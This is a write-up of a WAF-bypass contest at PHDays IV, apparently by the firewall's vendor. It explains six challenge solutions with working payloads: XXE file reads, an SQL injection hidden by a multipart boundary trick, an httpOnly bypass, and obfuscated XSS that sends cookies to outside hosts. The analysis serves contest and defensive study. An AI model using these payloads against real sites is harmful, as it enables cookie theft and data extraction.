Analysis of tasks of the competition WAF Bypass on PHDays IV

This year, at Positive Hack Days, a WAF Bypass competition was held, where participants could try their hand at bypassing the PT Application Firewall . For us, holding such a competition was an excellent chance to test the product in battle, because the conference brought together the best experts in the field of information security.

For the competition, we have prepared a set of tasks. Each was a scenario with a typical vulnerability: with its help, it was necessary to get the flag. All tasks had a solution, but solutions were not always obvious. The participants had access to the report on scanning the source codes of tasks using another product of our company - Application Inspector . In this post we will tell about tasks, rounds and the gained experience.

1. XXE

The first task consisted of an XMLRPC server in PHP vulnerable to XML External Entities Injection. Vulnerability Eyed Application Inspector:

The task was warming up, and the Application Firewall was configured to block only simple XXEs:

<!DOCTYPE input [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><input>&xxe;</input>

The flag could be obtained using, for example, parameter entities:

 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY % xxe SYSTEM "flag" > %xxe; ]> <body> <method a='a'>test</method> </body>

Or through DOCTYPE:

 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE body SYSTEM "flag"> <body><method>test</method></body>

2. SQL Injection

The purpose of this task was to get a flag from the database using SQL Injection. Most participants tried to bypass the filter instead of paying attention to the hint: it was necessary to detect an error in the WAF configuration, namely, incorrect data normalization. One of the most serious problems of modern WAFs is the normalization of incoming data in HTTP requests, errors of which can lead to a bypass at the protocol level. As Stefan Esser noted in his presentation of Shocking News in PHP Exploitation as early as 2009, WAF developers are trying to create one HTTP parser for all existing implementations, which is obviously impossible. The approach implemented in PT Application Firewall is normalization taking into account the features of the backend. Normalization was disabled for the job, which allowed the following traversing:

 POST /news.php HTTP/1.1 Host: task2.waf-bypass.phdays.com Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: multipart/form-data; boundary=------,xxxx Content-Length: 191 ------,xxxx Content-Disposition: form-data; name="img"; filename="img.gif" GIF89a ------ Content-Disposition: form-data; name="id" 1' union select null,null,flag,null from flag limit 1 offset 1-- - -------- ------,xxxx--

PHP has its own unique multipart data parser, which takes a comma-like value in the Content-Type header. Normal parsers take full value. Therefore, without normalizing, WAF will assume that the request contains a file that will not be checked by the filter. But PHP "sees" in this request, the id parameter with the payload.

3. httpOnly

This task and all subsequent ones are focused on client-side vulnerabilities. For the contest, we made a bot on Selenium, for which a cookie was set with a flag; The purpose of the job is to steal these cookies.

httpOnly is a cookie flag that denies access to its value using JavaScript (hence the name).

Vulnerable script code:

 <h4>httpOnly bypass</h4> <p>In this task you need to bypass httpOnly and steal bot cookies using <a href="http://waf-bypass.phdays.com/#bot">http://waf-bypass.phdays.com/#bot</a>. All XSS checks are disabled, but there is an intentional bug, try to find it!</p> <?php if(!isset($_GET['name'])) die("<p>Please provide name</p>"); if($_SERVER['REMOTE_ADDR'] == '127.0.0.1') { setcookie('flag', $_GET['name'] . '-' . file_get_contents('./flag')); } else { setcookie('flag', $_GET['name'] . '-' . md5(mt_rand())); } echo '<p>' . $_GET['name'] . '</p>'; ?>

Two points can be noted here: the user value falls into the cookie value, the input data is displayed as is. Obviously, by clicking on the link from XSS, the bot will not send its cookies because of httpOnly, which exposes Application Firewall. To bypass the protection, it was necessary to specify the httpOnly string in the cookie value, then WAF would consider that the flag is already set and you do not need to add your own:

httponly.php?name=;HttpOnly

4. Anomaly

In this task, participants were asked to check for an anomaly detection mechanism using machine learning algorithms that underlie the PT Application Firewall. A data model was prepared that was retrained (overfit) on disparate values. The essence of the detour was to make up such a string that satisfies the parameters of the trained statistical model. This task also had a Cross Site Scripting vulnerability, but httpOnly was not exposed. Only two participants managed to bypass even the statistical model weakened by us:

 aaaaaaaaaaaa ... [snip] ... aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaav%3Cvideo++src=//secsem.ru+aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa+onerror=src%2b=document.cookie+/%3E

It is worth noting that for the “dilution” of special characters that WAF responded to, an appeal was made to the attribute value of the tag from another attribute located far enough so that the string does not go beyond the threshold.

5. RegEx

The task of the participants in this task is to bypass the filter using regular expressions and steal the bot cookie. An integral part of any traditional WAF is regular expression based signatures. We once again made sure that a good WAF should not rely only on "regulars". Here are some of the workarounds:

 <img src = http://dsec.ru/bitrix/templates/dsec/img/logo.png onload = \"\\u0064\\u006F\\u0063\\u0075\\u006D\\u0065\\u006E\\u0074.write('<im\\u0067 src = http://sergeybelove.ru?ccc='%2b\\u0064\\u006F\\u0063\\u0075\\u006D\\u0065\\u006E\\u0074.cooki\\u0065%2b'>')\">

 1%3Cvideo%20%20src%3dx%20onerror%3d%0Asrc='ht'%2b'tp:'%2b'//'+d\\u006fcument['\\x63ookie']%3E%3C/video%3E

 <svg onload=\"var xStuff=HTMLElement['con'%2b'structor'],yStuff=xStuff('var img=new'%2b' Ima'%2b'ge('%2b') ;im'%2b'g.sr'%2b'c=\\'http:/'%2b'/labs.tom.vg/cookie=\\'%2bdoc'%2b'ument.coo'%2b'kie;doc'%2b'ument.doc'%2b'umentEl'%2b'ement.appe'%2b'ndCh'%2b'ild'%2b'('%2b'img) ;'),zStuff=yStuff()\">

6. Sanitize

In the final assignment, it was proposed to implement XSS, bypassing the protection, the essence of which was to encode the incoming values reflected in the response in the HTML entity.

 GET /sanitize.php?name=<script>alert(1)</script> HTTP/1.0

 HTTP/1.0 200 OK ... Hello, &lt;script&gt;alert(1)&lt;/script&gt;!

It would seem that iron defense; but the round was still there. To find the value coming from the user, search the entire body of the HTTP response, which may include other HTML tags. The workaround was to force WAF to shield the tags already present in the response, which would avoid filtering the target payload.

results

The winners were a team from Moscow State University - Georgy Noseyevich, Andrei Petukhov and Alexander Razdobarov. Solved all the tasks! The second place went to Ivan Novikov (d0znpp), and the third - to the speaker from Belgium, Tom Van Gutem. The winners received valuable prizes: Apple iPad Air, Sony Xperia Z2 and one-year license for Burp Suite Pro, respectively.

Some statistics: for the two days of the competition 122644 requests were blocked, 101 participants registered, only 11 were able to get at least one flag.